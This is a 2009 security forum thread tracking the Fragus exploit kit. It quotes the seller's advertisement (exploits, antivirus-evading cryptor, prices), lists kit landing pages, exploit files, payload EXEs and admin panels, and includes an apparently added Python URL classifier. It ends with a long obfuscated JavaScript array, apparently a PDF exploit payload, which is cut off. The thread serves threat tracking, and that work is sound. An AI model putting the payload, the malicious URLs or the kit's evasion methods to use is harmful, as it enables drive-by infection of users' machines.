Malware Domain List
February 09, 2010, 02:04:31 am *
Author Topic: Fragus exploit pack  (Read 4126 times)
SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« on: August 25, 2009, 03:56:53 pm »

Found at http://vx.eof-project.net/viewtopic.php?pid=1706
Quote
Administrator Toolbar:
  • Attractive design
  • Multilingual interface (Russian, English)
  • Administrator Toolbar is protected by a password
  • Advanced statistics for browsers (including versions), operating systems, countries, exploits
  • Possibility to check urgent summary data without page reloading
  • Files are uploaded from the Administrator Toolbar
  • Possibility to specify the name of the file with which your EXE will be uploaded into the system
  • Possibility to distinguish traffic between Sellers and to keep Seller-by-Seller independent statistics
  • Possibility to indicate his own file for each Seller or to upload a random one
  • Possibility for each Seller to indicate his own kit from the Exploit List, and also for total traffic, which makes it possible to shut down exploits inhibiting the browser, for resources where you can't be found
  • Possibility to give a Seller a unique link to a separate page with statistics for data verification without authorization
  • Possibility both to clean general statistics and for each Seller separately
  • Fragus enables you to watch over feedbacks of each exploit and to display them in an easy-to-use way; possibility to feed back on URL has many EXE
  • Also Fragus permits you to quickly find the link to traffic in either open or encoded (encoded iframe) form, for total traffic and for each Seller separately
  • All preferences are available right from the Administrator Toolbar

System features:
  • Exploit imaging of high quality, with the possibility of checking with the help of ajax whether the current exploit infects or not before loading the next one. This option can be disabled in the Administrator Toolbar
  • Possibility to edit host on the necessary URL after it is done allows you not to lose used traffic, and to utilize it pro domo sua. Also you can edit onto a separate URL those who visit the exploit pack twice or more
  • Complete exploit modularity in the system. Your coder will be able to add them easily
  • Zero-written cryptor of exploits doesn't overload the browser, but nevertheless protects the exploit pack safely from antiviruses
  • Cryptor lies in a separate file and if you want you can easily add your own cryptor
  • Patterns of pages for exploit imaging, with the page for those who visit twice, lie separately, disguised as a 404 error. And it won't be very difficult for you to edit them so they suit your own ends
  • Patterns of the Administrator Toolbar also lie separately, so those who don't like our design can change it easily
  • Fragus hides from searchbots, which disables domain detection
  • Fragus is highly optimized for operating with massive traffic flows and minimum load on the server
  • Installation will take less than 2 minutes. You don't have to get into files or edit something manually. The installation wizard will help you

Exploits:
  • Mdac, still infects IE6 well enough
  • PDF: printf(), collectEmailInfo(), getIcon(). Exploit images only for those who 100% have a vulnerable version of Adobe Acrobat. It is arranged so that it can infect absolutely all browsers where this plugin is installed
  • MS DirectShow, large break increment
  • MS09-002 - for IE7
  • MS Spreadsheet, rather new exploit
  • AOL IWinAmp, infects rather nicely, almost like PDF
  • MS Snapshot with instantaneous run
  • MS COM finishes IE6 off, if it doesn't break

Price:
800 USD
The exploit pack is sold with closed source code (IonCube)
Hiding of pack functioning from antiviruses (per Customer) - 30 USD
Zero-written cryptor (per Customer) - 150 USD
Large updates are paid

samples :

First you have to visit show.php. Otherwise you will receive only 404 for exploits and payload

exploits
Code:
fragtopmassage.ru/frag/show.php
flash exploit
Code:
fragtopmassage.ru/frag/swf.swf
pdf exploit
Code:
fragtopmassage.ru/frag/pdf.pdf
payload
Code:
fragtopmassage.ru/frag/load.php?e=3
control panel
Code:
fragtopmassage.ru/frag/admin.php

exploits
Code:
blt.kz/1/show.php
flash exploit
Code:
blt.kz/1/swf.swf
pdf exploit
Code:
blt.kz/1/pdf.pdf
payload
Code:
blt.kz/1/load.php?e=3
control panel
Code:
blt.kz/1/admin.php

Article from EvilFingers
http://evilfingers.blogspot.com/2009/08/fragus-new-botnet-framework-in-wild.html
Logged

Ruining the bad guy's day
SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #1 on: September 02, 2009, 02:25:54 pm »

http://blog.purewire.com/bid/19509/The-Fragus-Exploit-Kit
Logged

Ruining the bad guy's day
SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #2 on: September 02, 2009, 03:13:27 pm »

Fragus – crimeware in the wild
http://securitybananas.com/?p=134
Logged

Ruining the bad guy's day
paulroyal
Special Members
Newbie
*
Posts: 1


« Reply #3 on: September 02, 2009, 05:41:43 pm »

New, seen 2009-09-01; not Google Blacklisted/etc:

Code:
tour6.info/tomer/show.php?s=2f2d557669
Logged
SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #4 on: September 08, 2009, 04:05:23 am »

I came across 2 Fragus kits with almost undetected payloads.

Remember that you have to download show.php first.

Code:
cloudsregion.info/maner/show.php
cloudsregion.info/maner/load.php?e=2

http://www.virustotal.com/analisis/7ce9571bb83c2d13655b50e0fad2a98f69928e0d79202fa13f51e6e4eab1c1f8-1252397303 1/41


Code:
addvertseense.co.uk/show.php
addvertseense.co.uk/load.php?e=2
http://www.virustotal.com/analisis/26ad34c5afc858ef210493c530214b2162347bccf8e197f37e8b4c73da8900a3-1252397512 3/41
http://www.threatexpert.com/report.aspx?md5=85050c8c96a3d35b1ce981f7632c15b9

downloads

Code:
zstudio1.cn/v3/system/msvcr80.dll
http://www.virustotal.com/analisis/02bdde38e4c6bd795a092d496b8d6060cdbe71e22ef4d7a204e3050c1be44fa9-1252399791 0/41
Logged

Ruining the bad guy's day
Malware-Web-Threats
Special Members
Hero Member
*
Posts: 354


WWW
« Reply #5 on: September 10, 2009, 03:53:50 am »

Code:
geroyvoin.cn/1/show.php?s=747bbfed51
geroyvoin.cn/1/cosx.ipg
geroyvoin.cn/1/manual.swf
geroyvoin.cn/1/cegmoprwx.pdf
geroyvoin.cn/1/jpy5.exe
geroyvoin.cn/1/bgmnrsyz3.exe
geroyvoin.cn/1/dprtz3.exe
geroyvoin.cn/1/dfpquz3.exe
geroyvoin.cn/1/degjt3.exe
geroyvoin.cn/1/bdflu3.exe
geroyvoin.cn/1/dfwx3.exe
geroyvoin.cn/1/admin.php

Wepawet
VirusTotal - 4/41 (9.76%)
Logged

Malware-Web-Threats
Special Members
Hero Member
*
Posts: 354


WWW
« Reply #6 on: September 10, 2009, 05:31:50 am »

213.163.84.28
Code:
sockslab.net/2/admin.php
Logged

Malware-Web-Threats
Special Members
Hero Member
*
Posts: 354


WWW
« Reply #7 on: September 10, 2009, 07:10:37 am »

Code:
dmitrygaiduk.cn/show.php?s=1893da9ce4
dmitrygaiduk.cn/dgn.ipg
dmitrygaiduk.cn/adhlorvy.pdf
dmitrygaiduk.cn/bcluwy5.exe
dmitrygaiduk.cn/bgjmpqy2.exe
dmitrygaiduk.cn/cfku3.exe
dmitrygaiduk.cn/cjkosuwxy3.exe
dmitrygaiduk.cn/dfhjnwx3.exe
dmitrygaiduk.cn/dkmps3.exe
dmitrygaiduk.cn/hosuvwxz3.exe
dmitrygaiduk.cn/ilmry3.exe
dmitrygaiduk.cn/admin.php
Wepawet
VirusTotal - 2/41 (4.88%)

McAfee-GW-Edition: Heuristic.LooksLike.Win32.Suspicious.H!87
Panda: Suspicious file
Logged

SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #8 on: September 10, 2009, 12:31:53 pm »

Fragus has been modified. It doesn't use static filenames for pdf exploits and payloads any longer.
Payloads are only downloadable for limited amount of time (some minutes).

All Fragus kits which we have seen before have used pdf.pdf for the pdf file, swf.swf for the Flash and
load.php for the payload. Now the filenames for the pdf file and the payload change randomly and at each request.
The name of the Flash file seems to be always manual.swf.
 

For examples look at the last postings of this thread

or see this one here:

I have checked hxxp://git77.biz/peg/show.php?s=ccc648c6ef multiple times.

Here are 2 results.
http://wepawet.cs.ucsb.edu/view.php?hash=6223f79cf6f195fc5589e50f8544bbbc&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=a06d6231dfc563f09b4f2f4b4892605b&type=js
Logged

Ruining the bad guy's day
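The naming change described in Reply #8 is what an analyst sorting proxy logs or sandbox URL lists has to tell apart. The following classifier is an added example written for this thread (not a tool from Malware Domain List or any of the linked blogs); it encodes the file-name shapes quoted in the posts above (fixed pdf.pdf / swf.swf / load.php?e=N for the old kit, random lowercase names for the updated PDF and EXE, manual.swf for Flash, show.php landing page, admin.php panel) as hypothetical rules, and tags the URLs posted in this thread with them. Defanged hxxp:// and scheme-less forms are accepted as they appear in the posts.

```python
import re
from urllib.parse import urlsplit

# Hypothetical rules written for this thread, not part of any tool named here.
# File-name shapes come from the URLs posted above: the old kit used fixed names
# (pdf.pdf, swf.swf, load.php?e=N); the updated kit randomises the PDF and EXE
# names per request and keeps manual.swf for the Flash exploit.
NEW_PDF = re.compile(r"[a-z]{3,12}\.pdf")
NEW_EXE = re.compile(r"[a-z]{2,12}[0-9]\.exe")
OLD_PAYLOAD_QUERY = re.compile(r"e=[0-9]+")


def split_url(url):
    """Return (host, last path component, query) for a defanged or scheme-less URL."""
    url = url.replace("hxxp://", "http://", 1)
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return parts.hostname, parts.path.rsplit("/", 1)[-1], parts.query


def classify(url):
    """Tag one URL by its role in the kit, or None if it matches no known shape."""
    _host, name, query = split_url(url)
    if name == "show.php":
        return "landing"
    if name == "admin.php":
        return "panel"
    if name == "load.php" and OLD_PAYLOAD_QUERY.fullmatch(query):
        return "payload-old"
    if name == "pdf.pdf":
        return "pdf-old"
    if name == "swf.swf":
        return "flash-old"
    if name == "manual.swf":
        return "flash-new"
    if NEW_PDF.fullmatch(name):
        return "pdf-new"
    if NEW_EXE.fullmatch(name):
        return "payload-new"
    return None


def kit_version(urls):
    """Decide whether URLs from one host follow the old or the new naming scheme."""
    tags = {t for t in map(classify, urls) if t}
    old = any(t.endswith("-old") for t in tags)
    new = any(t.endswith("-new") for t in tags)
    if old and new:
        return "mixed"
    if new:
        return "new"
    if old:
        return "old"
    # Only landing page and/or panel seen: the kit is recognisable, its version is not.
    return "undetermined" if tags else "unknown"


def versions_by_host(urls):
    """Group URLs by host and report the naming scheme observed for each host."""
    by_host = {}
    for u in urls:
        host, _name, _query = split_url(u)
        by_host.setdefault(host, []).append(u)
    return {host: kit_version(group) for host, group in by_host.items()}


# Sample input: URLs posted in this thread. The .ipg files stay untagged because
# the thread does not say what they are.
SAMPLE_URLS = [
    "fragtopmassage.ru/frag/show.php",
    "fragtopmassage.ru/frag/swf.swf",
    "fragtopmassage.ru/frag/pdf.pdf",
    "fragtopmassage.ru/frag/load.php?e=3",
    "fragtopmassage.ru/frag/admin.php",
    "got77.biz/peg/show.php?s=75dbfbfc1f",
    "got77.biz/peg/chlnquxyz.pdf",
    "got77.biz/peg/mnqv2.exe",
    "got77.biz/peg/admin.php",
    "geroyvoin.cn/1/manual.swf",
    "geroyvoin.cn/1/cosx.ipg",
    "hxxp://git77.biz/peg/show.php?s=ccc648c6ef",
]

if __name__ == "__main__":
    for host, version in sorted(versions_by_host(SAMPLE_URLS).items()):
        print(f"{host}: {version}")
```

Because the new kit hands out the PDF and EXE only for a few minutes under names that change per request, the stable indicators worth alerting on are the show.php landing page, the unchanged manual.swf, and admin.php; the random-name rules are there to attribute a host after the fact, not to block on.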
Malware-Web-Threats
Special Members
Hero Member
*
Posts: 354


WWW
« Reply #9 on: September 10, 2009, 02:17:08 pm »

can't find the correct path to these domains - seems to be related

Code:
gat77.biz
bot77.biz

http://www.bfk.de/bfk_dnslogger.html?query=91.212.198.3
http://www.malwaredomainlist.com/mdl.php?search=91.212.198.3&colsearch=All&quantity=50&inactive=on
Logged

SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #10 on: September 10, 2009, 02:20:55 pm »

can't find the correct path to these domains - seems to be related

Code:
gat77.biz
bot77.biz

Haven't found the path, but one of our readers on Twitter sent me a message that all 77.biz domains use the new version.
I guess those 2 domains are related.
Logged

Ruining the bad guy's day
SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #11 on: September 11, 2009, 12:18:36 pm »

old format
Code:
bobunium.com/fr2/show.php?s=f801ff8253

new format
Code:
americaregion.info/born/show.php?s=dd6d6bb56c
busergondermags.com/f2hubba/show.php?s=019c9537bc
fartunaall.ru/task/show.php?s=e7e53d546c
Logged

Ruining the bad guy's day
Malware-Web-Threats
Special Members
Hero Member
*
Posts: 354


WWW
« Reply #12 on: September 12, 2009, 03:27:00 am »

Code:
got77.biz/peg/show.php?s=75dbfbfc1f
got77.biz/peg/chlnquxyz.pdf
got77.biz/peg/aeimnstxz3.exe
got77.biz/peg/chknz3.exe
got77.biz/peg/egijkmtx3.exe
got77.biz/peg/gjklmnrsy5.exe
got77.biz/peg/hwx3.exe
got77.biz/peg/inz3.exe
got77.biz/peg/mnqv2.exe
got77.biz/peg/optwx3.exe
got77.biz/peg/admin.php (control panel)
Wepawet
Logged

WIEx
Jr. Member
**
Posts: 26



WWW
« Reply #13 on: September 13, 2009, 06:46:59 am »

Malware-Web-Threats )

PDF file filter in first section: ASCII85Decode, FlateDecode

Code:
var fra=[205,190,196,198,206,207,211,213,105,188,204,210,197,205,219,113,207,196,204,217,212,147,181,187,209,131,225,219,207,178,194,200,130,223,197,217,188,198,145,198,203,210,206,189,190,141,140,162,208,204,183,127,222,211,199,214,218,185,129,160,211,199,214,218,185,145,224,100,223,197,217,188,198,160,211,199,214,218,185,132,214,207,200,215,219,187,191,209,193,142,148,147,181,187,209,137,152,141,162,187,187,215,207,216,210,135,194,183,213,205,214,159,228,83,188,216,200,201,216,208,184,196,131,207,218,205,211,168,198,213,195,212,216,205,113,127,222,208,199,214,135,185,183,220,198,213,197,203,134,203,209,191,217,199,200,185,187,139,124,139,217,157,125,143,147,127,219,149,159,138,135,136,207,150,148,151,121,123,216,146,168,148,151,110,203,150,138,154,148,140,190,138,147,146,168,137,220,129,152,152,142,139,217,151,125,138,147,127,219,152,151,129,152,136,207,158,166,151,125,123,216,138,154,152,151,110,203,149,138,150,168,140,190,136,147,138,150,137,220,124,154,147,138,139,217,151,121,141,166,127,219,148,151,128,141,136,207,150,149,158,125,123,216,141,153,167,154,110,203,153,142,169,148,140,190,138,147,146,168,137,220,128,142,150,138,139,217,159,139,134,166,127,219,148,170,125,134,136,207,157,148,159,139,123,216,155,170,149,170,110,203,152,146,158,166,140,190,155,165,138,158,137,220,129,152,147,147,139,217,154,125,138,147,127,219,152,151,129,154,136,207,158,166,158,140,123,216,141,169,153,159,110,203,151,142,156,165,140,190,154,148,143,167,137,220,123,152,168,140,139,217,159,139,155,149,127,219,169,169,142,153,136,207,155,165,155,143,123,216,146,153,153,153,110,203,152,144,171,165,140,190,139,152,146,159,137,220,126,140,147,142,139,217,159,139,139,154,127,219,151,170,128,137,136,207,157,152,159,139,123,216,145,158,151,154,110,203,169,141,150,151,140,190,142,165,143,156,137,220,123,134,154,144,139,217,173,124,134,150,127,219,167,160,124,137,136,207,155,148,155,130,123,216,155,170,152,152,110,203,169,160,153,151,140,190,134,169,141,156,137,220,122,138,165,159,139,217,154,
129,134,150,127,219,155,155,143,136,136,207,169,149,151,129,123,216,138,170,167,173,110,203,169,155,150,151,140,190,155,165,142,150,137,220,126,142,168,160,139,217,173,129,137,165,127,219,169,156,128,139,136,207,158,166,156,142,123,216,140,154,152,157,110,203,166,141,150,151,140,190,142,165,144,156,137,220,125,142,147,157,139,217,156,127,142,165,127,219,148,154,122,153,136,207,158,166,171,124,123,216,146,167,148,155,110,203,166,141,150,151,140,190,139,168,143,172,137,220,140,137,152,138,139,217,158,141,142,167,127,219,153,158,121,142,136,207,168,156,156,123,123,216,157,167,151,154,110,203,152,156,158,165,140,190,151,149,159,158,137,220,143,156,169,160,139,217,154,123,156,169,127,219,156,169,140,134,136,207,172,150,173,128,123,216,142,172,165,172,110,203,154,143,168,156,140,190,140,152,140,171,137,220,138,152,154,146,139,217,160,129,140,153,127,219,165,169,127,140,136,207,169,148,154,124,123,216,144,151,166,159,110,203,147,138,156,152,140,190,139,147,138,150,137,220,126,138,153,146,139,217,158,123,140,155,127,219,151,156,127,139,136,207,151,167,153,125,123,216,145,154,154,160,110,203,152,142,155,148,140,190,152,155,143,153,137,220,143,153,164,155,139,217,158,140,134,167,127,219,153,156,143,156,136,207,158,166,151,125,123,216,146,153,170,159,110,203,147,157,169,152,140,190,140,166,156,150,137,220,142,134,155,155,139,217,156,121,143,155,127,219,154,173,127,142,136,207,152,169,157,142,123,216,144,158,154,155,110,203,154,140,157,153,140,190,140,167,144,169,137,220,139,142,152,142,139,217,155,142,142,168,127,219,169,170,121,155,136,207,155,153,173,143,123,216,147,153,148,155,110,203,150,141,155,148,140,190,139,147,157,150,137,220,126,140,152,138,139,217,156,126,142,165,127,219,156,154,121,138,136,207,157,170,170,123,123,216,157,152,156,154,110,203,152,140,154,167,140,190,152,155,143,150,137,220,122,151,150,144,139,217,158,121,136,169,127,219,153,156,143,156,136,207,155,166,151,125,123,216,143,156,153,158,110,203,156,146,168,156,140,190,142,164,160,171,137,220,143,156,147,
159,139,217,151,125,139,152,127,219,148,151,127,151,136,207,170,155,173,143,123,216,145,154,154,159,110,203,154,138,157,152,140,190,136,169,141,167,137,220,127,141,149,160,139,217,158,125,140,169,127,219,151,158,124,141,136,207,156,150,153,142,123,216,145,167,154,160,110,203,154,138,152,170,140,190,140,154,144,155,137,220,127,138,149,160,139,217,158,121,140,167,127,219,155,155,128,136,136,207,153,151,158,128,123,216,144,155,150,172,110,203,153,143,157,156,140,190,134,147,138,150,134,144,132,204,196,204,134,210,214,185,147,216,200,203,215,202,170,198,200,130,136,137,220,121,151,147,155,139,217,151,138,134,164,127,219,148,168,121,151,136,207,150,165,151,138,120,140,100,220,197,217,105,190,200,187,214,198,211,184,185,206,151,212,211,215,116,198,196,211,210,211,200,173,145,217,187,216,132,201,178,189,197,198,213,199,210,134,203,209,191,217,199,200,185,187,139,124,139,217,151,138,134,164,127,219,148,168,121,151,133,131,161,218,200,187,118,203,191,199,200,204,187,201,204,212,203,161,153,121,145,217,187,216,132,218,185,200,196,211,163,204,204,170,186,200,204,217,205,225,174,129,203,191,199,212,201,181,197,198,197,148,208,204,183,189,215,194,161,219,207,178,194,200,130,200,205,206,171,194,210,189,209,146,211,174,196,202,206,206,160,218,185,200,196,211,143,223,201,178,189,197,198,213,199,210,116,147,197,195,205,198,211,184,185,206,149,227,110,221,170,200,131,192,207,208,211,171,194,210,189,209,161,201,178,189,197,198,213,199,210,119,201,216,188,217,216,217,178,196,202,130,150,144,218,185,200,196,211,143,159,221,170,200,131,188,210,211,202,180,147,197,195,205,198,211,184,185,206,136,217,217,201,188,202,213,195,212,203,143,121,130,197,195,205,198,211,184,185,206,136,210,201,213,176,202,203,135,217,212,217,170,207,140,149,221,204,208,181,187,139,188,210,211,202,180,132,207,191,212,203,219,177,129,214,202,216,197,224,133,134,219,142,150,148,151,121,127,222,188,210,211,202,180,147,197,198,213,199,210,116,184,207,201,201,207,146,175,191,207,198,200,208,214,172,193,158,215,112,218,
200,187,118,208,191,211,195,200,187,200,196,211,163,210,204,192,118,164,204,216,197,224,113,127,158,192,213,214,143,191,183,213,122,207,161,151,132,191,159,139,154,148,151,132,191,142,133,143,223,212,174,195,194,187,216,214,200,194,177,204,183,163,198,211,184,185,206,133,206,201,200,185,184,207,201,201,207,162,198,96,217,187,216,132,213,190,195,160,139,152,157,160,130,143,156,147,159,157,160,130,143,156,147,159,157,160,130,143,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,159,220,189,191,207,136,214,214,208,183,202,201,130,136,137,155,126,134,147,138,204,134,147,183,203,208,131,161,225,113,175,203,209,189,218,205,214,183,118,198,201,210,208,200,171,181,200,199,199,205,211,113,127,222,208,199,214,135,188,190,200,198,210,199,214,173,187,160,207,212,201,218,172,183,211,191,142,134,140,190,140,151,147,150,137,220,122,142,164,139,139,217,151,121,134,147,127,219,156,169,121,134,136,207,153,148,155,121,123,216,142,150,156,169,110,203,1
55,156,155,152,140,190,134,151,142,150,137,220,125,134,155,156,139,217,159,139,134,151,127,219,148,155,125,134,136,207,152,148,151,141,123,216,140,150,148,151,110,203,150,158,150,148,140,190,134,147,145,169,137,220,121,134,154,145,139,217,151,122,141,151,127,219,151,154,140,137,136,207,156,152,170,121,123,216,142,150,156,169,110,203,154,146,153,148,140,190,142,165,138,169,137,220,121,153,151,138,139,217,158,121,142,165,127,219,165,171,122,153,136,207,155,156,159,139,123,216,159,168,148,159,110,203,155,156,150,157,140,190,137,151,142,150,137,220,125,134,155,158,139,217,159,139,141,166,127,219,151,170,126,142,136,207,154,152,157,138,123,216,158,151,153,168,110,203,149,156,171,150,140,190,142,165,159,152,137,220,142,152,168,157,139,217,156,138,138,169,127,219,156,154,126,136,136,207,155,154,172,138,123,216,143,155,156,160,110,203,152,144,150,152,140,190,142,165,143,157,137,220,124,153,154,141,139,217,158,125,142,165,127,219,155,159,124,137,136,207,172,151,151,124,123,216,146,168,153,157,110,203,149,138,157,154,140,190,156,150,138,153,137,220,140,143,150,141,139,217,156,121,138,156,127,219,165,171,125,135,136,207,172,170,154,124,123,216,138,172,151,157,110,203,148,142,168,169,140,190,137,155,138,153,137,220,128,138,169,140,139,217,170,122,134,155,127,219,148,171,140,156,136,207,172,165,151,124,123,216,159,168,152,151,110,203,152,146,171,170,140,190,156,155,141,168,137,220,142,139,154,143,139,217,159,139,139,168,127,219,150,155,125,140,136,207,169,151,151,124,123,216,146,168,154,157,110,203,151,146,150,167,140,190,139,153,146,168,137,220,121,137,148,157,139,217,159,139,154,150,127,219,156,168,121,138,136,207,169,151,151,124,123,216,143,171,153,173,110,203,166,141,155,148,140,190,141,167,146,170,137,220,126,141,147,146,139,217,169,129,139,149,127,219,167,168,124,137,136,207,155,166,159,138,123,216,155,152,169,159,110,203,169,160,172,170,140,190,137,149,160,172,137,220,129,152,166,138,139,217,173,123,156,154,127,219,152,173,138,155,136,207,157,153,169,129,123,216,144,155,1
50,172,110,203,164,156,157,156,140,190,143,155,144,156,137,220,138,152,153,144,139,217,170,121,137,150,127,219,154,152,139,142,136,207,150,148,157,125,123,216,143,150,148,151,110,203,152,142,156,156,140,190,141,149,144,158,137,220,124,139,153,143,139,217,152,140,136,151,127,219,155,155,127,143,136,207,155,152,156,121,123,216,156,158,153,154,110,203,169,157,167,165,140,190,141,166,138,170,137,220,126,139,169,160,139,217,159,139,134,151,127,219,156,154,143,142,136,207,150,167,170,125,123,216,144,169,166,151,110,203,168,138,158,165,140,190,139,147,147,158,137,220,127,156,153,146,139,217,153,142,140,168,127,219,154,159,127,138,136,207,157,150,158,126,123,216,144,170,154,170,110,203,165,146,155,152,140,190,138,168,146,171,137,220,142,153,147,159,139,217,156,126,156,169,127,219,157,154,121,138,136,207,153,151,156,121,123,216,143,150,167,151,110,203,152,144,155,148,140,190,139,152,146,168,137,220,129,137,147,142,139,217,158,143,153,149,127,219,167,153,129,137,136,207,155,150,155,140,123,216,156,158,153,151,110,203,148,155,153,154,140,190,141,147,140,172,137,220,126,139,169,160,139,217,156,139,134,151,127,219,153,157,126,141,136,207,159,156,169,129,123,216,146,167,170,172,110,203,169,160,150,169,140,190,134,151,143,155,137,220,121,134,153,155,139,217,171,128,156,169,127,219,155,155,127,142,136,207,157,148,158,125,123,216,140,172,151,168,110,203,153,145,152,170,140,190,141,151,144,172,137,220,124,141,150,145,139,217,157,123,136,168,127,219,155,168,127,143,136,207,157,148,153,143,123,216,144,157,154,156,110,203,153,140,152,170,140,190,140,156,144,153,137,220,128,135,153,160,139,217,158,138,141,155,127,219,150,172,124,137,136,207,157,156,157,126,123,216,138,150,154,156,107,127,158,208,199,214,135,182,187,208,185,199,214,217,170,207,160,200,203,219,135,138,200,213,187,223,140,144,132,204,196,204,134,199,202,134,134,219,138,201,148,202,121,185,147,189,161,218,200,187,118,196,190,202,214,164,121,206,151,138,150,148,151,121,145,217,187,216,132,218,172,181,207,191,212,161,218,177,1
87,207,198,201,211,203,174,132,207,191,212,203,219,177,128,149,149,220,197,217,105,194,200,200,163,197,203,173,200,144,130,217,199,198,181,187,209,133,150,220,154,129,127,158,208,199,214,135,194,183,213,205,214,161,220,183,187,214,189,199,212,204,113,120,136,207,159,148,160,121,123,216,147,150,157,151,107,127,158,211,199,214,218,185,147,201,195,222,195,208,189,126,220,187,216,215,215,117,194,200,200,143,159,221,170,200,131,189,213,217,213,189,136,160,130,201,199,148,121,206,151,138,150,148,151,121,127,146,187,202,200,217,132,188,210,204,142,218,200,187,118,198,201,219,210,219,134,134,158,189,213,217,213,189,146,198,201,219,210,219,123,145,198,201,219,210,219,116,129,140,213,211,201,212,168,183,213,204,199,221,194,172,197,216,200,218,193,164,194,183,213,205,214,143,218,177,187,207,198,201,211,203,174,145,224,100,220,197,217,105,197,217,191,216,202,211,184,205,160,207,212,201,218,172,183,211,191,142,134,140,190,134,198,138,201,137,220,121,185,147,189,136,141,162,192,190,204,198,203,140,214,191,187,213,192,210,211,222,119,194,200,200,205,216,207,133,138,151,147,155,150,144,196,197,217,191,216,202,211,184,205,142,151,213,218,204,187,188,207,201,221,159,228,83,202,203,195,217,146,202,184,194,207,187,200,183,219,184,200,200,151,169,211,211,181,183,197,136,201,211,211,181,187,198,206,171,209,200,178,194,172,200,204,211,143,196,201,216,188,208,158,137,107,130,208,205,205,158,214,191,187,213,192,210,211,222,198,127,158,215,112,202,220,183,185,215,195,213,210,135,172,197,207,198,199,198,198,176,187,215,195,201,211,213,113,127,222,195,204,140,200,185,198,145,190,213,199,149,140,197,207,198,199,198,149,176,187,215,163,201,211,213,114,209,217,187,216,132,200,187,200,220,151,212,201,222,105,151,213,204,199,221,143,114,145,217,187,216,132,221,191,198,200,206,206,221,200,134,203,209,191,217,199,200,185,187,139,124,139,217,157,125,143,147,127,219,149,159,138,135,136,207,150,148,151,121,123,216,146,168,148,151,110,203,150,138,154,148,140,190,138,147,146,168,137,220,129,152,152,142,13
9,217,151,125,138,147,127,219,152,151,129,152,136,207,158,166,151,125,123,216,138,154,152,151,110,203,149,138,150,168,140,190,136,147,138,150,137,220,124,154,147,138,139,217,151,121,141,166,127,219,148,151,128,141,136,207,150,149,158,125,123,216,141,153,167,154,110,203,153,142,169,148,140,190,138,147,146,168,137,220,128,142,150,138,139,217,159,139,134,166,127,219,148,170,125,134,136,207,157,148,159,139,123,216,155,170,149,170,110,203,152,146,158,166,140,190,155,165,138,158,137,220,129,152,147,147,139,217,154,125,138,147,127,219,152,151,129,154,136,207,158,166,158,140,123,216,141,169,153,159,110,203,151,142,156,165,140,190,154,148,143,167,137,220,123,152,168,140,139,217,159,139,155,149,127,219,169,169,142,153,136,207,155,165,155,143,123,216,146,153,153,153,110,203,152,144,171,165,140,190,139,152,146,159,137,220,126,140,147,142,139,217,159,139,139,154,127,219,151,170,128,137,136,207,157,152,159,139,123,216,145,158,151,154,110,203,169,141,150,151,140,190,142,165,143,156,137,220,123,134,154,144,139,217,173,124,134,150,127,219,167,160,124,137,136,207,155,148,155,130,123,216,155,170,152,152,110,203,169,160,153,151,140,190,134,169,141,156,137,220,122,138,165,159,139,217,154,129,134,150,127,219,155,155,143,136,136,207,169,149,151,129,123,216,138,170,167,173,110,203,169,155,150,151,140,190,155,165,142,150,137,220,126,142,168,160,139,217,173,129,137,165,127,219,169,156,128,139,136,207,158,166,156,142,123,216,140,154,152,157,110,203,166,141,150,151,140,190,142,165,144,156,137,220,125,142,147,157,139,217,156,127,142,165,127,219,148,154,122,153,136,207,158,166,171,124,123,216,146,167,148,155,110,203,166,141,150,151,140,190,139,168,143,172,137,220,140,137,152,138,139,217,158,141,142,167,127,219,153,158,121,142,136,207,168,156,156,123,123,216,157,167,151,154,110,203,152,156,158,165,140,190,151,149,159,158,137,220,143,156,169,160,139,217,154,123,156,169,127,219,156,169,140,134,136,207,172,150,173,128,123,216,142,172,165,172,110,203,154,143,168,156,140,190,140,152,140,171,137,220,13
8,152,154,146,139,217,160,129,140,153,127,219,165,169,127,140,136,207,169,148,154,124,123,216,144,151,166,159,110,203,147,138,156,152,140,190,139,147,138,150,137,220,126,138,153,146,139,217,158,123,140,155,127,219,151,156,127,139,136,207,151,167,153,125,123,216,145,154,154,160,110,203,152,142,155,148,140,190,152,155,143,153,137,220,143,153,164,155,139,217,158,140,134,167,127,219,153,156,143,156,136,207,158,166,151,125,123,216,146,153,170,159,110,203,147,157,169,152,140,190,140,166,156,150,137,220,142,134,155,155,139,217,156,121,143,155,127,219,154,173,127,142,136,207,152,169,157,142,123,216,144,158,154,155,110,203,154,140,157,153,140,190,140,167,144,169,137,220,139,142,152,142,139,217,155,142,142,168,127,219,169,170,121,155,136,207,155,153,173,143,123,216,147,153,148,155,110,203,150,141,155,148,140,190,139,147,157,150,137,220,126,140,152,138,139,217,156,126,142,165,127,219,156,154,121,138,136,207,157,170,170,123,123,216,157,152,156,154,110,203,152,140,154,167,140,190,152,155,143,150,137,220,122,151,150,144,139,217,158,121,136,169,127,219,153,156,143,156,136,207,155,166,151,125,123,216,143,156,153,158,110,203,156,146,168,156,140,190,142,164,160,171,137,220,143,156,147,159,139,217,151,125,139,152,127,219,148,151,127,151,136,207,170,155,173,143,123,216,145,154,154,159,110,203,154,